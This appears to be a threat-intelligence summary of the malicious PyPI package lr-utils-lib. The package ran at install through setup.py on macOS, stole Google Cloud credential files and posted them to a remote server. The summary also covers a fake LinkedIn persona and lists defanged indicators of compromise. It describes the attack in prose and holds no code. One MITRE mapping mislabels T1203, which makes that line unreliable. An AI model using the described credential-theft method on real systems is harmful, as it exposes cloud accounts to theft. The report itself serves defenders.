The Python package lr-utils-lib uploaded to PyPi in June 2024 contained malicious code that targets macOS and exfiltrates Google Cloud Platform credentials to a remote server. It also ties social engineering through a fake LinkedIn profile for Lucid Zenith, illustrating broader cybersecurity challenges. #lr-utils-lib #macOS #GoogleCloudPlatform #LucidZenith #ApexCompaniesLLC
Keypoints
- A malicious Python package named “lr-utils-lib” was uploaded to PyPi in June 2024.
- The malware activates automatically upon installation and targets macOS systems.
- It attempts to harvest Google Cloud authentication data from specific files.
- The stolen credentials are sent to a remote server via HTTPS POST requests.
- A fake LinkedIn profile for “Lucid Zenith” raises concerns about social engineering tactics.
- AI-powered search engines inconsistently verified the false information related to the profile.
- This incident underscores the need for rigorous security practices when using third-party packages.
MITRE Techniques
- [T1003] Credential Dumping – The malware attempts to access and exfiltrate sensitive Google Cloud authentication data from files like application_default_credentials.json and credentials.db. (‘The malware attempts to access and exfiltrate sensitive Google Cloud authentication data from files like application_default_credentials.json and credentials.db.’)
- [T1041] Data Exfiltration – The malware sends harvested credentials to a remote server identified as europe-west2-workload-422915[.]cloudfunctions[.]net via HTTPS POST requests. (‘The malware sends harvested credentials to a remote server identified as europe-west2-workload-422915[.]cloudfunctions[.]net via HTTPS POST requests.’)
- [T1203] Social Engineering – The existence of a fake LinkedIn profile for “Lucid Zenith” suggests potential social engineering tactics to enhance credibility and deliver malicious packages. (‘The existence of a fake LinkedIn profile for “Lucid Zenith” suggests potential social engineering tactics to enhance credibility and deliver malicious packages.’)
Indicators of Compromise
- [URL/Domain] europe-west2-workload-422915[.]cloudfunctions[.]net – remote server used for data exfiltration
- [Email] lucid[.]zeniths[.]0j@icloud[.]com – linked to the social engineering angle and profile impersonation
- [File] application_default_credentials.json – targeted credential file
- [File] credentials.db – targeted credential database
- [Package] lr-utils-lib – malicious Python package name
- [File/Script] setup.py – location of malicious code execution during installation